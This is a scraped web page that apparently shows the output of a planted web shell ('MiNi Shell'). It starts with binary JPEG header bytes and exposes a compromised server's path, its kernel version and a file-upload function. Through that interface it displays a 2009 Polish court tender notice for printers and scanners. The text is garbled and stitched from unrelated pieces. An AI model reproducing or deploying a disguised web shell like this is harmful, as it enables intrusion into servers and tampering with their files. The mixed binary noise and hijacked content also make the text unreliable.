JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090707/106779-N-2009.html

<p class="kh_header"><b>Częstochowa: Dostawa sprzętu informatycznego tj. drukarek i skanerów do Sądu Okręgowego w Częstochowie</b><br>
<b>Numer ogłoszenia: 106779 - 2009; data zamieszczenia: 07.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Częstochowie , ul. Dąbrowskiego 23/35, 42-200 Częstochowa, woj. śląskie, tel. 034 3681696, faks 034 3644210.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.so.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.czestochowa.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu informatycznego tj. drukarek i skanerów do Sądu Okręgowego w Częstochowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.	Przedmiotem zamówienia są dostawy - dostawa sprzętu informatycznego tj. drukarek i skanerów do Sądu Okręgowego w Częstochowie.

3.2.	Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 2 do SIWZ.

Wykonawca winien zobowiązać się do jednorazowego odbioru zużytego sprzętu komputerowego w ilości nie większej od ilości sprzętu dostarczonego 
w wyniku realizacji niniejszego zamówienia publicznego, w terminie określonym przez Zamawiającego, w okresie 1 roku od dnia dostarczenia przedmiotu zamówienia.

3.3.	Wspólny słownik zamówień:
CPV: 	30237000-9 - akcesoria komputerowe
3.4.	Zamawiający wymaga, aby dostarczony przedmiot zamówienia odpowiadał wymaganiom i parametrom opisanym w załączniku nr 2 do SIWZ.
3.5.	Zamawiający dopuszcza rozwiązania równoważne opisywanym 
w specyfikacji istotnych warunków zamówienia. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.
3.6.	Wymagany okres rękojmi na dostarczony przedmiot zamówienia:

3.6.1. 
a/ dla drukarek laserowych, opisanych w załączniku nr 2 do niniejszej SIWZ, na okres 2 lat, 
b/ Rękojmia rozpoczyna bieg od dnia podpisania protokołu odbioru towaru bez wad.  
c/ O ile towar jest objęty gwarancją producenta, Wykonawca zobowiązany jest wydać Zamawiającemu dokument gwarancyjny przy wydaniu towaru. 
d/ W przypadku wystąpienia wad w okresie rękojmi Wykonawca zobowiązuje się do ich usuwania w terminie 72 godzin od zgłoszenia, w odniesieniu do drukarek.
e/ Do biegu terminu usunięcia wady nie wlicza się sobót, niedziel oraz dni świątecz-nych. 
f/ Jeżeli usunięcie wady we wskazanym w pkt. lit. d terminie nie będzie możliwe, ze względu na jej charakter lub złożoność, Wykonawca zawiadamia o tym w ciągu 48 (czterdzieści osiem) godzin od zgłoszenia wady Zamawiającego, w sposób przyjęty dla zgłoszenia wady z tytułu rękojmi, wskazując termin jej usunięcia. W takiej sytuacji Wykonawca zobowiązuje się na własny koszt dostarczyć towar zastępczy, którego parametry nie będą odbiegać od parametrów towaru przeznaczonego do naprawy. 
g/ Wady towaru usuwane będą w miejscu ich eksploatacji. W przypadku, gdy usunię-cie wady w miejscu eksploatacji nie będzie możliwe Wykonawca dokona naprawy w innym miejscu. 
h/ Wszelkie koszty konieczne do poniesienia w związku z wykonaniem obowiązków wynikających z rękojmi ciążą na Wykonawcy, bez prawa żądania ich zwrotu. 

3.6.2.:
a/ dla skanerów, opisanych w załączniku nr 2 do niniejszej SIWZ, na okres 2 lat, 
b/ Rękojmia rozpoczyna bieg od dnia podpisania protokołu odbioru towaru bez wad.  
c/ O ile towar jest objęty gwarancją producenta, Wykonawca zobowiązany jest wydać Zamawiającemu dokument gwarancyjny przy wydaniu towaru. 
d/ W przypadku wystąpienia wad w okresie rękojmi Wykonawca zobowiązuje się do ich usuwania w następujących terminach:
- do 7 dni od zgłoszenia, w odniesieniu do skanerów opisanych w załączniku nr 2 do niniejszej SIWZ .
e/ Do biegu terminu usunięcia wady nie wlicza się sobót, niedziel oraz dni świątecz-nych. 
f/ Jeżeli usunięcie wady we wskazanym w ust. d terminie nie będzie możliwe ze względu na jej charakter lub złożoność Wykonawca dostarczy nowe, sprawne urzą-dzenie w tym samym terminie.  
g/ Wady towaru usuwane będą:
- w miejscu ich eksploatacji, a w przypadku, gdy usunięcie wady w miejscu eksplo-atacji nie będzie możliwe, Wykonawca dokona naprawy w innym miejscu, w odnie-sieniu do skanerów, opisanych załączniku nr 2 do niniejszej SIWZ. 
h/ Wszelkie koszty konieczne do poniesienia w związku z wykonaniem obowiązków wynikających z rękojmi ciążą na Wykonawcy, bez prawa żądania ich zwrotu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.23.70.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 8.1	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
posiadają niezbędne uprawnienia do wykonywania działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wyko-nanie zamówienia;
nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego, na podstawie art. 24 ustawy
8.2	O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, których oferta odpowiada zasadom określonym w ustawie i spełnia wymagania określone w niniejszej SIWZ.  
8.3   	Wykonawca ubiegający się o zamówienie publiczne musi spełnić niżej wymienione warunki:
8.3.1.	wypełnić OFERTĘ z załącznikami; -  załącznik nr 1 do siwz
8.3.2.	posiadać odpowiednie doświadczenie zawodowe tj. wykonać w ciągu ostatnich trzech lat minimum jedno zadanie odpowiadające swoim rodzajem i wartością dostawie stanowiącej przedmiot zamówienia 
w zadaniu, na które Wykonawca składa ofertę. 
NA POTWIERDZENIE TEGO WARUNKU NALEŻY:
załączyć wykaz wykonanych w ciągu ostatnich trzech lat dostaw zbliżonych co do zakresu i wartości  do dostaw objętych zamówieniem, wraz z dokumentami potwierdzającymi ich należyte wykonanie np. referencje -  załącznik nr 5 do siwz

8.4	Zamawiający oceni, czy Wykonawca spełnia warunki o których mowa w pkt. 8.1 - 8.3 na postawie złożonego wraz z ofertą oświadczenia o spełnieniu wa-runków udziału w postępowaniu i na podstawie złożonych wraz ofertą doku-mentów żądanych przez Zamawiającego, potwierdzających spełnienie tych warunków, o których mowa w Rozdziale IX SIWZ.
8.5	Jeżeli Wykonawca nie złoży oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub z treści dołączonych doku-mentów nie będzie wynikać, że zostały spełnione warunki określone 
w pkt. 8.1, to po nieskutecznym wezwaniu do uzupełnienia zgodnie z art. 26 ust. 3 ustawy, Zamawiający wykluczy Wykonawcę odpowiednio na podstawie art. 24 ust 1 i 2 ustawy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 9.1	Na ofertę składają się następujące dokumenty i załączniki:
-	wypełniony formularz ofertowy (oryginał) - załącznik nr 1 do siwz;
-	opis przedmiotu zamówienia, uzupełniony i podpisany przez Wykonawcę, sporządzony wg wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ. 

Zamawiający wymaga, a Wykonawca zobowiązany jest do wypełnienia każdego z punktów opisu oferowanego sprzętu zgodnie z opisem przedmiotu zamówienia i formularzami załączonymi do opisu.

-	oświadczenie wykonawcy przystępującego do udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 ustawy wg wzoru określonego w załączniku do specyfikacji istotnych warunków zamówienia (oryginał) - załącznik nr 4 do siwz;
9.2. 	W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na pod-stawie art. 24 ustawy Zamawiający żąda załączenia do oferty następujących dokumentów:
-	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadcze-nia o wpisie do ewidencji dzia?łalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (oryginał lub kopia potwierdzona za zgodność z oryginałem).
-	aktualnych zaświadczeń  właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświad-czeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykona-nia decyzji właściwego organu - wystawionych nie wcześniej niż 3 mie-siące  przed upływem terminu składania ofert (oryginał lub kopia potwierdzona za zgodność z oryginałem).
-	aktualnej informacji z Krajowego Rejestru Karnego  albo równoważne-go zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia lub zamieszkania osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionych nie wcześniej niż 6 mie-sięcy przed upływem terminu składania ofert (oryginał lub kopia po-twierdzona za zgodność z oryginałem), 
-	aktualnej informacji z Krajowego Rejestru Karnego w zakresie określo-nym w art. 24 ust. 1 pkt 9 ustawy  wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (oryginał lub kopia potwierdzona za zgodność z oryginałem).
9.3. 	W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty: 
-	wykaz wykonanych w ciągu ostatnich trzech lat dostaw zbliżonych co do zakresu i wartości  do dostawy objętej zamówieniem (oryginał) - załącznik nr 5 do siwz, wraz z dokumentami potwierdzającymi ich należyte wykonanie (oryginał lub kopia potwierdzona za zgodność 
z oryginałem). 
9.4. 	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów  o których mowa w punkcie: 9.2, składa dokument, lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości;
nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie spo-łeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, od-roczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu.
nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

9.5	Wymienione w tym rozdziale dokumenty mogą zostać złożone w oryginale lub kopii, potwierdzonej za zgodność z oryginałem przez przedstawiciela wyko-nawcy uprawnionego do podpisania oferty.
Zamawiający zażąda przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wtedy, gdy przedstawiona przez wykonawcę kserokopia do-kumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości, 
a zamawiający nie może sprawdzić jej autentyczności w inny sposób..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.czestochowa.so.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy w Częstochowie; 42-200 Częstochowa; ul. Dąbrowskiego 23/35; pokój numer 11 (niski parter).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2009 godzina 10:00, miejsce: Sąd Okręgowy w Częstochowie; 42-200 Częstochowa; ul. Dąbrowskiego 23/35; pokój numer 11 (niski parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com